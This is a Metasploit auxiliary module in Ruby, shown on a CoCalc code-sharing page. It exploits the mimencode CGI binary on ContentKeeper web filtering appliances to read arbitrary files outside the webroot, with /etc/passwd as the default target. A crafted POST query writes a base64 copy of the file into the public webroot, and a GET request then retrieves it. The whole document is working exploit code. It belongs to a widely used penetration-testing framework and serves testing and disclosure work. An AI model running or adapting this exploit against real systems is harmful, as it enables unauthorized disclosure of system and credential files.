CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Scanner

9


10
  def initialize

11
    super(

12
      'Name' => 'ContentKeeper Web Appliance mimencode File Access',

13
      'Description' => %q{

14
        This module abuses the 'mimencode' binary present within

15
        ContentKeeper Web filtering appliances to retrieve arbitrary

16
        files outside of the webroot.

17
        },

18
      'References' => [

19
        [ 'OSVDB', '54551' ],

20
        [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],

21
      ],

22
      'Author' => [ 'aushack' ],

23
      'License' => MSF_LICENSE)

24


25
    register_options(

26
      [

27
        OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),

28
        OptString.new('URL', [ true, 'The path to mimencode', '/cgi-bin/ck/mimencode']),

29
      ]

30
    )

31
  end

32


33
  def run_host(_ip)

34
    tmpfile = Rex::Text.rand_text_alphanumeric(20) # Store the base64 encoded traversal data in a hard-to-brute filename, just in case.

35


36
    print_status("Attempting to connect to #{rhost}:#{rport}")

37
    res = send_request_raw(

38
      {

39
        'method' => 'POST',

40
        'uri' => normalize_uri(datastore['URL']) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE']

41
      }, 25

42
    )

43


44
    if (res && (res.code == 500))

45


46
      print_good("Request appears successful on #{rhost}:#{rport}! Response: #{res.code}")

47


48
      file = send_request_raw(

49
        {

50
          'method' => 'GET',

51
          'uri' => '/' + tmpfile

52
        }, 25

53
      )

54


55
      if (file && (file.code == 200))

56
        print_status("Request for #{datastore['FILE']} appears to have worked on #{rhost}:#{rport}! Response: #{file.code}\r\n#{Rex::Text.decode_base64(file.body)}")

57
      elsif (file && file.code)

58
        print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")

59
      end

60
    elsif (res && res.code)

61
      print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")

62
    end

63
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

64
  rescue ::Timeout::Error, ::Errno::EPIPE

65
  end

66
end

67


68